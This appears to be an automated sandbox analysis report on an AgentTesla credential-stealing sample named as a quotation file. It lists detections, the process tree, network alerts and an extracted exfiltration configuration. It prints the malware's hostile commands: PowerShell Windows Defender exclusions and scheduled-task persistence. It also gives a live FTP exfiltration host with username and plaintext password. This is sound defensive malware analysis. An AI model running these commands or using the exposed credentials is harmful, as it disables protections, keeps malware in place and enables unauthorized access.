Windows Analysis Report
rQuotation3200025006.exe

Overview

General Information

Sample name:rQuotation3200025006.exe
Analysis ID:1520520
MD5:36c4bff0f1cdcda62da9229500ca1e38
SHA1:de74dbf7bac85a3a06c7038a4d4241389e6a5c8f
SHA256:fda83ecb5bd6a07dedaf6be0fce7c626e21e9df94d82ddb905460e9d6a25a162
Tags: AgentTesla, exe, user-Porcupine

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains potential unpacker
.NET source code contains very large array initializations
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Connects to many ports of the same IP (likely port scanning)
Contains functionality to log keystrokes (.Net Source)
Contains functionality to register a low level keyboard hook
Hides that the sample has been downloaded from the Internet (zone.identifier)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses FTP
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • rQuotation3200025006.exe (PID: 6744 cmdline: "C:\Users\user\Desktop\rQuotation3200025006.exe" MD5: 36C4BFF0F1CDCDA62DA9229500CA1E38)
    • powershell.exe (PID: 824 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rQuotation3200025006.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7476 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • powershell.exe (PID: 6108 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\pBBqGOzrz.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 1748 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 7068 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pBBqGOzrz" /XML "C:\Users\user\AppData\Local\Temp\tmp3D2.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 6512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • rQuotation3200025006.exe (PID: 2756 cmdline: "C:\Users\user\Desktop\rQuotation3200025006.exe" MD5: 36C4BFF0F1CDCDA62DA9229500CA1E38)
  • pBBqGOzrz.exe (PID: 7260 cmdline: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe MD5: 36C4BFF0F1CDCDA62DA9229500CA1E38)
    • schtasks.exe (PID: 7420 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pBBqGOzrz" /XML "C:\Users\user\AppData\Local\Temp\tmp1AB5.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • pBBqGOzrz.exe (PID: 7608 cmdline: "C:\Users\user\AppData\Roaming\pBBqGOzrz.exe" MD5: 36C4BFF0F1CDCDA62DA9229500CA1E38)
    • pBBqGOzrz.exe (PID: 7616 cmdline: "C:\Users\user\AppData\Roaming\pBBqGOzrz.exe" MD5: 36C4BFF0F1CDCDA62DA9229500CA1E38)
  • sgxIb.exe (PID: 7844 cmdline: "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe" MD5: 36C4BFF0F1CDCDA62DA9229500CA1E38)
    • schtasks.exe (PID: 7932 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pBBqGOzrz" /XML "C:\Users\user\AppData\Local\Temp\tmp4705.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sgxIb.exe (PID: 7988 cmdline: "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe" MD5: 36C4BFF0F1CDCDA62DA9229500CA1E38)
    • sgxIb.exe (PID: 7996 cmdline: "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe" MD5: 36C4BFF0F1CDCDA62DA9229500CA1E38)
    • sgxIb.exe (PID: 8004 cmdline: "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe" MD5: 36C4BFF0F1CDCDA62DA9229500CA1E38)
    • sgxIb.exe (PID: 8012 cmdline: "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe" MD5: 36C4BFF0F1CDCDA62DA9229500CA1E38)
  • sgxIb.exe (PID: 7096 cmdline: "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe" MD5: 36C4BFF0F1CDCDA62DA9229500CA1E38)
    • schtasks.exe (PID: 736 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pBBqGOzrz" /XML "C:\Users\user\AppData\Local\Temp\tmp6606.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 6744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sgxIb.exe (PID: 7188 cmdline: "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe" MD5: 36C4BFF0F1CDCDA62DA9229500CA1E38)
  • cleanup
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution:
  • SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "FTP", "Host": "ftp://ftp.haliza.com.my", "Username": "origin@haliza.com.my", "Password": "JesusChrist007$"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    SourceRuleDescriptionAuthorStrings
    0000001C.00000002.4163218058.00000000033DC000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      0000001C.00000002.4163218058.00000000033B1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        0000001C.00000002.4163218058.00000000033B1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          0000000E.00000002.4164492788.000000000354A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            00000008.00000002.4163306810.0000000002CDC000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              SourceRuleDescriptionAuthorStrings
              0.2.rQuotation3200025006.exe.377e4e0.2.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                0.2.rQuotation3200025006.exe.377e4e0.2.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  0.2.rQuotation3200025006.exe.377e4e0.2.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                  • 0x3317c:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                  • 0x331ee:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                  • 0x33278:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                  • 0x3330a:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                  • 0x33374:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                  • 0x333e6:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                  • 0x3347c:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                  • 0x3350c:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                  0.2.rQuotation3200025006.exe.377e4e0.2.unpackMALWARE_Win_AgentTeslaV2AgenetTesla Type 2 Keylogger payloadditekSHen
                  • 0x30370:$s2: GetPrivateProfileString
                  • 0x2f9fa:$s3: get_OSFullName
                  • 0x3116b:$s5: remove_Key
                  • 0x31357:$s5: remove_Key
                  • 0x32275:$s6: FtpWebRequest
                  • 0x3315e:$s7: logins
                  • 0x336d0:$s7: logins
                  • 0x36427:$s7: logins
                  • 0x36493:$s7: logins
                  • 0x37f12:$s7: logins
                  • 0x3702d:$s9: 1.85 (Hash, version 2, native byte-order)
                  22.2.sgxIb.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security

                    System Summary

                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rQuotation3200025006.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rQuotation3200025006.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\rQuotation3200025006.exe", ParentImage: C:\Users\user\Desktop\rQuotation3200025006.exe, ParentProcessId: 6744, ParentProcessName: rQuotation3200025006.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rQuotation3200025006.exe", ProcessId: 824, ProcessName: powershell.exe
                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\rQuotation3200025006.exe, ProcessId: 2756, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sgxIb
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pBBqGOzrz" /XML "C:\Users\user\AppData\Local\Temp\tmp1AB5.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pBBqGOzrz" /XML "C:\Users\user\AppData\Local\Temp\tmp1AB5.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe, ParentImage: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe, ParentProcessId: 7260, ParentProcessName: pBBqGOzrz.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pBBqGOzrz" /XML "C:\Users\user\AppData\Local\Temp\tmp1AB5.tmp", ProcessId: 7420, ProcessName: schtasks.exe
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pBBqGOzrz" /XML "C:\Users\user\AppData\Local\Temp\tmp3D2.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pBBqGOzrz" /XML "C:\Users\user\AppData\Local\Temp\tmp3D2.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\rQuotation3200025006.exe", ParentImage: C:\Users\user\Desktop\rQuotation3200025006.exe, ParentProcessId: 6744, ParentProcessName: rQuotation3200025006.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pBBqGOzrz" /XML "C:\Users\user\AppData\Local\Temp\tmp3D2.tmp", ProcessId: 7068, ProcessName: schtasks.exe
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rQuotation3200025006.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rQuotation3200025006.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\rQuotation3200025006.exe", ParentImage: C:\Users\user\Desktop\rQuotation3200025006.exe, ParentProcessId: 6744, ParentProcessName: rQuotation3200025006.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rQuotation3200025006.exe", ProcessId: 824, ProcessName: powershell.exe

                    Persistence and Installation Behavior

                    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pBBqGOzrz" /XML "C:\Users\user\AppData\Local\Temp\tmp3D2.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pBBqGOzrz" /XML "C:\Users\user\AppData\Local\Temp\tmp3D2.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\rQuotation3200025006.exe", ParentImage: C:\Users\user\Desktop\rQuotation3200025006.exe, ParentProcessId: 6744, ParentProcessName: rQuotation3200025006.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pBBqGOzrz" /XML "C:\Users\user\AppData\Local\Temp\tmp3D2.tmp", ProcessId: 7068, ProcessName: schtasks.exe
                    Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                    2024-09-27T13:10:17.718048+0200 | 2029927 | 1 | A Network Trojan was detected | 192.168.2.4 | 49741 | 110.4.45.197 | 21 | TCP
                    2024-09-27T13:10:24.710806+0200 | 2029927 | 1 | A Network Trojan was detected | 192.168.2.4 | 49751 | 110.4.45.197 | 21 | TCP
                    2024-09-27T13:10:31.146663+0200 | 2029927 | 1 | A Network Trojan was detected | 192.168.2.4 | 49756 | 110.4.45.197 | 21 | TCP
                    2024-09-27T13:10:19.571041+0200 | 2855542 | 1 | A Network Trojan was detected | 192.168.2.4 | 49746 | 110.4.45.197 | 53334 | TCP
                    2024-09-27T13:10:19.576306+0200 | 2855542 | 1 | A Network Trojan was detected | 192.168.2.4 | 49746 | 110.4.45.197 | 53334 | TCP
                    2024-09-27T13:10:25.537921+0200 | 2855542 | 1 | A Network Trojan was detected | 192.168.2.4 | 49753 | 110.4.45.197 | 51497 | TCP
                    2024-09-27T13:10:25.543689+0200 | 2855542 | 1 | A Network Trojan was detected | 192.168.2.4 | 49753 | 110.4.45.197 | 51497 | TCP
                    2024-09-27T13:10:31.976691+0200 | 2855542 | 1 | A Network Trojan was detected | 192.168.2.4 | 49757 | 110.4.45.197 | 55730 | TCP
                    2024-09-27T13:10:31.982121+0200 | 2855542 | 1 | A Network Trojan was detected | 192.168.2.4 | 49757 | 110.4.45.197 | 55730 | TCP

                    AV Detection

                    Source: 0.2.rQuotation3200025006.exe.3741cc0.3.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.haliza.com.my", "Username": "origin@haliza.com.my", "Password": "JesusChrist007$"}
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeReversingLabs: Detection: 57%
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeReversingLabs: Detection: 57%
                    Source: rQuotation3200025006.exeReversingLabs: Detection: 57%
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeJoe Sandbox ML: detected
                    Source: rQuotation3200025006.exeJoe Sandbox ML: detected
                    Source: rQuotation3200025006.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49733 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49740 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49748 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49755 version: TLS 1.2
                    Source: rQuotation3200025006.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeCode function: 4x nop then jmp 06CC57B2h0_2_06CC4D7B
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeCode function: 4x nop then jmp 06CC57B2h0_2_06CC4ECD
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exeCode function: 4x nop then jmp 06CC57B2h0_2_06CC4EE4
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeCode function: 4x nop then jmp 06AC4AAAh9_2_06AC4073
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeCode function: 4x nop then jmp 06AC4AAAh9_2_06AC41C5
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exeCode function: 4x nop then jmp 06AC4AAAh9_2_06AC41DC
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 4x nop then jmp 066D4AAAh16_2_066D4073
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 4x nop then jmp 066D4AAAh16_2_066D41C5
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 4x nop then jmp 066D4AAAh16_2_066D41DC
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 4x nop then jmp 07274AAAh25_2_07274073
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 4x nop then jmp 07274AAAh25_2_072741C5
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 4x nop then jmp 07274AAAh25_2_072741DC

                    Networking

                    Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.4:49753 -> 110.4.45.197:51497
                    Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.4:49746 -> 110.4.45.197:53334
                    Source: Network trafficSuricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.4:49751 -> 110.4.45.197:21
                    Source: Network trafficSuricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.4:49756 -> 110.4.45.197:21
                    Source: Network trafficSuricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.4:49741 -> 110.4.45.197:21
                    Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.4:49757 -> 110.4.45.197:55730
                    Source: global trafficTCP traffic: 110.4.45.197 ports 65186,64130,59960,61524,61759,53786,55824,55768,51546,61163,57406,65361,64095,62561,62089,1,53694,52440,2,56668,53334,58620,51497,55730,55438,60182,52328,21,55958
                    Source: global trafficTCP traffic: 192.168.2.4:49738 -> 110.4.45.197:53694
                    Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
                    Source: Joe Sandbox ViewASN Name: EXABYTES-AS-APExaBytesNetworkSdnBhdMY EXABYTES-AS-APExaBytesNetworkSdnBhdMY
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: unknownDNS query: name: api.ipify.org
                    Source: unknownFTP traffic detected: 110.4.45.197:21 -> 192.168.2.4:49737
                      220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                      220-You are user number 5 of 50 allowed.
                      220-Local time is now 19:10. Server port: 21.
                      220-This is a private system - No anonymous login
                      220-IPv6 connections are also welcome on this server.
                      220 You will be disconnected after 15 minutes of inactivity.
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                    Source: global trafficDNS traffic detected: DNS query: ftp.haliza.com.my
                    Source: rQuotation3200025006.exe, 00000008.00000002.4163306810.0000000002E28000.00000004.00000800.00020000.00000000.sdmp, rQuotation3200025006.exe, 00000008.00000002.4163306810.0000000002CDC000.00000004.00000800.00020000.00000000.sdmp, rQuotation3200025006.exe, 00000008.00000002.4163306810.0000000002D3B000.00000004.00000800.00020000.00000000.sdmp, rQuotation3200025006.exe, 00000008.00000002.4163306810.0000000002D9C000.00000004.00000800.00020000.00000000.sdmp, pBBqGOzrz.exe, 0000000E.00000002.4164492788.000000000354A000.00000004.00000800.00020000.00000000.sdmp, pBBqGOzrz.exe, 0000000E.00000002.4164492788.00000000035FF000.00000004.00000800.00020000.00000000.sdmp, pBBqGOzrz.exe, 0000000E.00000002.4164492788.00000000036EA000.00000004.00000800.00020000.00000000.sdmp, pBBqGOzrz.exe, 0000000E.00000002.4164492788.00000000036E5000.00000004.00000800.00020000.00000000.sdmp, pBBqGOzrz.exe, 0000000E.00000002.4164492788.0000000003634000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000016.00000002.1961223046.000000000326C000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 0000001C.00000002.4163218058.00000000036C7000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 0000001C.00000002.4163218058.00000000033DC000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 0000001C.00000002.4163218058.0000000003496000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ftp.haliza.com.my
                    Source: rQuotation3200025006.exe, 00000000.00000002.1735923407.0000000006762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                    Source: rQuotation3200025006.exe, 00000000.00000002.1735923407.0000000006762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                    Source: rQuotation3200025006.exe, 00000000.00000002.1735923407.0000000006762000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                    Source: rQuotation3200025006.exe, 00000000.00000002.1732806803.00000000036B9000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000016.00000002.1958682977.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                    Source: rQuotation3200025006.exe, 00000000.00000002.1732806803.00000000036B9000.00000004.00000800.00020000.00000000.sdmp, rQuotation3200025006.exe, 00000008.00000002.4163306810.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, pBBqGOzrz.exe, 0000000E.00000002.4164492788.00000000034B1000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000016.00000002.1958682977.0000000000402000.00000040.00000400.00020000.00000000.sdmp, sgxIb.exe, 00000016.00000002.1961223046.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 0000001C.00000002.4163218058.000000000336C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                    Source: rQuotation3200025006.exe, 00000008.00000002.4163306810.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, pBBqGOzrz.exe, 0000000E.00000002.4164492788.00000000034B1000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000016.00000002.1961223046.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 0000001C.00000002.4163218058.000000000336C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                    Source: rQuotation3200025006.exe, 00000008.00000002.4163306810.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, pBBqGOzrz.exe, 0000000E.00000002.4164492788.00000000034B1000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000016.00000002.1961223046.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 0000001C.00000002.4163218058.000000000336C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                    Source: unknown Network traffic detected: HTTP traffic on port 49733 -> 443
                    Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49733
                    Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49755
                    Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49740
                    Source: unknown Network traffic detected: HTTP traffic on port 49740 -> 443
                    Source: unknown Network traffic detected: HTTP traffic on port 49748 -> 443
                    Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49748
                    Source: unknown Network traffic detected: HTTP traffic on port 49755 -> 443
                    Source: unknown HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49733 version: TLS 1.2
                    Source: unknown HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49740 version: TLS 1.2
                    Source: unknown HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49748 version: TLS 1.2
                    Source: unknown HTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.4:49755 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    Source: 0.2.rQuotation3200025006.exe.3741cc0.3.raw.unpack, SKTzxzsJw.cs .Net Code: _71ZRqC1D
                    Source: 0.2.rQuotation3200025006.exe.377e4e0.2.raw.unpack, SKTzxzsJw.cs .Net Code: _71ZRqC1D
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe Code function: 8_2_0692C628 SetWindowsHookExA 0000000D,00000000,?,?,?,?,?,?,?,?,?,0692D458,00000000,000000008_2_0692C628
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe Windows user hook set: 0 keyboard low level C:\Users\user\Desktop\rQuotation3200025006.exe
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\pBBqGOzrz.exe
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                    Source: C:\Users\user\Desktop\rQuotation3200025006.exe Window created: window name: CLIPBRDWNDCLASS
                    Source: C:\Users\user\AppData\Roaming\pBBqGOzrz.exe Window created: window name: CLIPBRDWNDCLASS
                    Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe Window created: window name: CLIPBRDWNDCLASS

                    System Summary

